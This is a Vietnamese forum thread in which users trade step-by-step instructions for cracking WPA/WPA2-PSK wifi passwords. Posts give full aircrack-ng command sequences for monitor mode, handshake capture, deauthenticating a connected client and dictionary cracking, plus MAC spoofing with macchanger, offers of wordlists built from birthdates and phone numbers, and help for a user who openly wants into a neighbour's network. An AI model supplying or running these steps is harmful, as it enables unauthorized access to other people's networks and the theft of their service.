[Help] Password của wifi WPA-PSK

[ngoctunggialai]

Hack à cũng hên xui thôi. quan trong là có từ điển.
các bước cần chuẩn bị :
Tải bộ từ điển về hoặc là dùng từ điển có sẵn trong trong BT .
một cái USB và Backtrack*.ISO
Soft tạo boot linux unetbootin-windows-575.exe để tạo file boot cho linux trên usb và xả nén file ISO vào USB. còn nếu dùng máy ảo thì phức tạp hơn và phải dùng card WL ngoài chú ý :kiển tra card mạng có hỗ trợ hack không(chuyển sang chế độ monitoring mode được).
Ok tiến hành thử coi.
1 Boot vào USB
chọn safe mode hoặc startx để vào graphic mode.
mở shell thứ 1
gõ lệng :
airmon-ng kiểm tra wlan có ok không ví dụ ok thì sẽ hiện chẳng hạn như Wlan0,ath0...

airmon-ng start Wlan0 (ví dụ khi gõ lệnh airmon-ng nó hiện ra .. wlan0 thì lệnh sau mới dùng wlan0, ở đâu tui ví dụ là wlan0).

thu thập các thông tin của AP cần attack những thông tin cần: kênh, mac của AP,mac của client đang kết nối đến AP.

airodump-ng -c 6 --bssid xx:xx:xx:xx:xx:xx -w tenfilechuagoitinbatduoc mon0
-c 6 là kênh của AP đó nhìn thấy chữ CH bên trên đó. -w là ghi thông tin bắt được vào
vào tenfilechuagoitinbatduoc kết quả chú ý nếu thấy chứ WPA Handshake ... ở góc
trên phải là đã bắt tay 4 lần(quá trình kết nối của một client đến AP phải qua 4 lần)

để quá trình này diễn ra nhanh thì dùng lệnh sau.

aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c yy:yy:yy:yy:yy:yy mon0

yy:yy... là mac của client đang kết nối tới AP đó

nếu hiện WPA Handshake .. như đã nói ở trên thì tiến hành bước cuối cùng là dò keys

mở shell mới

aircrack-ng -c /đường dẫn file bắt gói tin -w đường dẫn file từ điển

VD: aircrack-ng -c /root/tenfilechuagoitinbatduoc-01.cap -w /mnt/IT/wordlist/keys.txt

--------------
tóm tắt ngắn gọn
1: airodump-ng
2: airmon-ng start wlan0
3: airodump-ng -c 1 --bssid 00:1A:2B:83:CB:82 -w capture mon0
5: aireplay-ng -0 1 -a 00:1A:2B:83:CB:82 -c CC:AF:78:A4:9B:71 mon0
6: aircrack-ng -c /root/capture-01.cap -w /mnt/IT/wordlist/keys.txt

Waiting !!

--------------

Nếu cần thì PM ngoctunggialai@yahoo.com

Nên tìm hiểu kỹ hiểu ý nghĩa lệnh trước hack ,bạn có thể tham khảo link sau:
http://vn.360plus.yahoo.com/thanglon...article?mid=5&
http://www.aircrack-ng.org/doku.php?id=cracking_wpa

http://trongtien.wordpress.com/2010/...y-tren-vmware/

[yakuku]

Trích:

Nguyên văn bởi ngoctunggialai

Hack à cũng hên xui thôi. quan trong là có từ điển.
các bước cần chuẩn bị :
Tải bộ từ điển về hoặc là dùng từ điển có sẵn trong trong BT .
một cái USB và Backtrack*.ISO
Soft tạo boot linux unetbootin-windows-575.exe để tạo file boot cho linux trên usb và xả nén file ISO vào USB. còn nếu dùng máy ảo thì phức tạp hơn và phải dùng card WL ngoài chú ý :kiển tra card mạng có hỗ trợ hack không(chuyển sang chế độ monitoring mode được).
Ok tiến hành thử coi.
1 Boot vào USB
chọn safe mode hoặc startx để vào graphic mode.
mở shell thứ 1
gõ lệng :
airmon-ng kiểm tra wlan có ok không ví dụ ok thì sẽ hiện chẳng hạn như Wlan0,ath0...

airmon-ng start Wlan0 (ví dụ khi gõ lệnh airmon-ng nó hiện ra .. wlan0 thì lệnh sau mới dùng wlan0, ở đâu tui ví dụ là wlan0).

thu thập các thông tin của AP cần attack những thông tin cần: kênh, mac của AP,mac của client đang kết nối đến AP.

airodump-ng -c 6 --bssid xx:xx:xx:xx:xx:xx -w tenfilechuagoitinbatduoc mon0
-c 6 là kênh của AP đó nhìn thấy chữ CH bên trên đó. -w là ghi thông tin bắt được vào
vào tenfilechuagoitinbatduoc kết quả chú ý nếu thấy chứ WPA Handshake ... ở góc
trên phải là đã bắt tay 4 lần(quá trình kết nối của một client đến AP phải qua 4 lần)

để quá trình này diễn ra nhanh thì dùng lệnh sau.

aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c yy:yy:yy:yy:yy:yy mon0

yy:yy... là mac của client đang kết nối tới AP đó

nếu hiện WPA Handshake .. như đã nói ở trên thì tiến hành bước cuối cùng là dò keys

mở shell mới

aircrack-ng -c /đường dẫn file bắt gói tin -w đường dẫn file từ điển

VD: aircrack-ng -c /root/tenfilechuagoitinbatduoc-01.cap -w /mnt/IT/wordlist/keys.txt

--------------
tóm tắt ngắn gọn
1: airodump-ng
2: airmon-ng start wlan0
3: airodump-ng -c 1 --bssid 00:1A:2B:83:CB:82 -w capture mon0
5: aireplay-ng -0 1 -a 00:1A:2B:83:CB:82 -c CC:AF:78:A4:9B:71 mon0
6: aircrack-ng -c /root/capture-01.cap -w /mnt/IT/wordlist/keys.txt

Waiting !!

--------------

Nếu cần thì PM ngoctunggialai@yahoo.com

Nên tìm hiểu kỹ hiểu ý nghĩa lệnh trước hack ,bạn có thể tham khảo link sau:
http://vn.360plus.yahoo.com/thanglon...article?mid=5&
http://www.aircrack-ng.org/doku.php?id=cracking_wpa

http://trongtien.wordpress.com/2010/...y-tren-vmware/

bạn hướng dẫn khá chi tiết. mình cũng có xem qua 1 số tài liệu thấy có thêm thao tác 'macchanger -m 00:11:22:33:44:55 mon0' nữa, cái này là để đổi địa chỉ mac của máy mình, k bik nó có ý nghĩa gì. bạn giải thích dùm mình với. thanks bạn !

[vongcohay]

Trích:

Nguyên văn bởi zerofly

chỉ mình hack wpa-psk với nhà hàng xóm mình sài mạng down rất lẹ tự nhiên mấy hôm nay ng ta cài pas ai chỉ mình hack với đêm down it phần mềm cho máy ...thank

Hack pass của wifi WPA/WPA2 thì được chứ không phải k, nhưng mà nếu người ta đặt pass phức tạp thì dò lâu lắm.

Việc hack wifi thì điều kiện cần là:

1. Có ít nhất 1 máy đang truy cập wifi
2. Card mạng của máy laptop dùng để hack wifi phải cho phép (như máy của mình dùng card Broadcom hack phà phà.
3. Dùng hệ điều hành Linux (Backtrack 5 hack ok nhất, và dễ làm nhất)
4. Cần 1 cái wordlist đủ lớn để dò pass (tốn thời gian nhiều)

--------------------------------------------------------------------
Các bước hack làm như các bước dưới đây:

1. airmon-ng
2. airmon-ng start wlan0
3. airodump-ng mon0
4. copy mac AP: 00A0:1F:44:EB, copy mac client: 00:11:1B:C4:CD:4A và channel của Wifi tấn công.
5. Airodump-ng –w capturefile-with-packages --bssid <mac AP> -c <channel> mon0
6. Mở cửa sổ mới.
7. aireplay-ng --deauth 1 -a <mac AP> -c <mac client> mon0
8. aircrack-ng capturefile-with-packages-01.cap –w ./wordlist.lst
9. Chờ.

----------------------------------------------------------------------
Còn đây là wordlist 28GB nén lại còn 76MB. tải về làm thử nhé

link dowload


Chúc bạn thành công!

[thienhau1990]

ec, việt nam nó đặt password chữ thì dò không biết tới khi nào, nhưng nếu đặt bằng ngày tháng năm sinh thì mình hack trong vòng 30s, còn bằng số đt thì nếu dò hết các màng từ 090 đến 098 thì khoảng 8~ 9 tiếng, mình đã thử hack thành công chuẩn Wpa2 gần nhà nó đặt pass ngày tháng năm sinh và đã thành công, bạn nào cần wordlist ngày tháng năm sinh và số điện thoại thì liên hệ mình: yahoo thienhau1990
bạn nào biết sử dụng crunch trong backtrack5 thì tạo cũng nhanh lắm

[TestHack93]

hi ! Mình cũng đang nghiên cứu về crack wifi thông quả giải mã gói tệp tin từ wifi mã hóa WPA2 . Chuẩn bị xuất ra công cụ ngôn ngữ Delph/C++ các bạn chờ và ủng hộ mình nhé !

[khongnoi21]

Bạn TestHack93 kêu chờ mà sao lâu wa không trả lời

[mrzava]

chỉ cần bạn cấu hình AP của bạn chỉ cho 1 MAC của máy bạn zô thui. rồi đặt Pass #$%@#!^**(^. vậy là ok.

[ngoctunggialai]

Trích:

Nguyên văn bởi yakuku

bạn hướng dẫn khá chi tiết. mình cũng có xem qua 1 số tài liệu thấy có thêm thao tác 'macchanger -m 00:11:22:33:44:55 mon0' nữa, cái này là để đổi địa chỉ mac của máy mình, k bik nó có ý nghĩa gì. bạn giải thích dùm mình với. thanks bạn !

Lệnh macchanger thường nếu hack các vấn đề khác để khỏi bị lộ khi tấn công bằng OS BT, còn ở đây là làm giả một địa chỉ mac để AP gửi nhầm vào máy mình, khi đó bạn có thể truy cập trái phép đc.

[chubengoc]

Trích:

Nguyên văn bởi TestHack93

hi ! Mình cũng đang nghiên cứu về crack wifi thông quả giải mã gói tệp tin từ wifi mã hóa WPA2 . Chuẩn bị xuất ra công cụ ngôn ngữ Delph/C++ các bạn chờ và ủng hộ mình nhé !

Ngày bạn ra công cụ sẽ là ngày bạn nổi tiếng khắp thế giới ^^ cô mang niềm tự hào về cho việt nam đi bạn :p

[hoangodixe]

Trích:

Nguyên văn bởi chubengoc

Ngày bạn ra công cụ sẽ là ngày bạn nổi tiếng khắp thế giới ^^ cô mang niềm tự hào về cho việt nam đi bạn :p

Pác ấy là hacker của Nga về Việt Nam mà. Ko biết pác ấy có làm việc cho quân đội China chuyên hack hệ thống của Mỹ Không.

Hack WPA-PSK/ WPA2-PSK đều có 1 cấu trúc là bắt gói tin của Client trao đổi với ACP sau đó dủng 1 file từ điển lớn dò Pass. Đây là dạng hack theo kiểu mò kim đáy bể hên xui là chính. Pass Wifi đặt là số điện thoại hay tên + ngày tháng năm sinh thì còn có cơ may dò ra. còn đặt dạng Ho@ngOdixe&#85ok thì chắc dò 100 năm ko biết ra chưa.